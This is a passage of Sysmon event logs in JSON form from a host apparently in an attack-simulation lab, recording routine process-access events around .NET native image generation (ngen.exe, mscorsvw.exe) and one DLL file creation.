C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:15.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EF-5F25-0000-001079111200}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7915,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:15.309\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EF-5F25-0000-001018151200}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:15.309","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EF-5F25-0000-001018151200}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7916,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:15.309\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EF-5F25-0000-001018151200}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:15.309","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EF-5F25-0000-001018151200}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7917,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:15.309\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EF-5F25-0000-001018151200}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:15.309","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EF-5F25-0000-001018151200}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7918,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:18.340\r\nProcessGuid: {A837DB8D-04EF-5F25-0000-001018151200}\r\nProcessId: 1008\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\3f0-0\\System.Windows.Forms.DataVisualization.dll\r\nCreationUtcTime: 2020-08-01 06:00:18.340","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:18.340","ProcessGuid":"{A837DB8D-04EF-5F25-0000-001018151200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\3f0-0\\System.Windows.Forms.DataVisualization.dll","CreationUtcTime":"2020-08-01 06:00:18.340","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7919,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.434\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010071A1200}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.434","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010071A1200}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7920,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.434\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010071A1200}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.434","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010071A1200}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7921,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010071A1200}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010071A1200}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7922,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.497\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-0010AC1D1200}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.497","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-0010AC1D1200}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
